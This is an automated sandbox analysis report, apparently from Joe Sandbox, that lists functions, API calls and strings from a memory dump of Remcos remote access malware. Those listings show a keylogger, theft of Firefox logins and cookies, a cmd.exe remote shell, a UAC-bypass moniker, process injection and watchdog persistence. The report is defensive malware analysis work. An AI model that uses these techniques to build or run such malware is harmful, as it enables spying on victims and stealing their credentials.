                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                • API String ID: 2994406822-18413064
                                                • Opcode ID: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                • Opcode Fuzzy Hash: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                • OpenMutexA.KERNEL32 ref: 00412181
                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                • API String ID: 3018269243-13974260
                                                • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFile$FirstNext
                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                • API String ID: 1164774033-3681987949
                                                • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32 ref: 004168FD
                                                • EmptyClipboard.USER32 ref: 0041690B
                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                • CloseClipboard.USER32 ref: 00416990
                                                • OpenClipboard.USER32 ref: 00416997
                                                • GetClipboardData.USER32 ref: 004169A7
                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                • CloseClipboard.USER32 ref: 004169BF
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                • String ID: !D@
                                                • API String ID: 3520204547-604454484
                                                • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Close$File$FirstNext
                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 3527384056-432212279
                                                • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                • String ID:
                                                • API String ID: 297527592-0
                                                • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                • API String ID: 3756808967-1743721670
                                                • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                • API String ID: 0-1861860590
                                                • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 0040755C
                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Object_wcslen
                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                • API String ID: 240030777-3166923314
                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                • String ID:
                                                • API String ID: 3587775597-0
                                                • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                • String ID: JD$JD$JD
                                                • API String ID: 745075371-3517165026
                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFile$FirstNext
                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 1164774033-405221262
                                                • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2341273852-0
                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$CreateFirstNext
                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                • API String ID: 341183262-3812160132
                                                • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                • GetLastError.KERNEL32 ref: 0040A328
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • GetMessageA.USER32 ref: 0040A376
                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                Strings
                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                • String ID: Keylogger initialization failure: error
                                                • API String ID: 3219506041-952744263
                                                • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                • String ID:
                                                • API String ID: 1888522110-0
                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
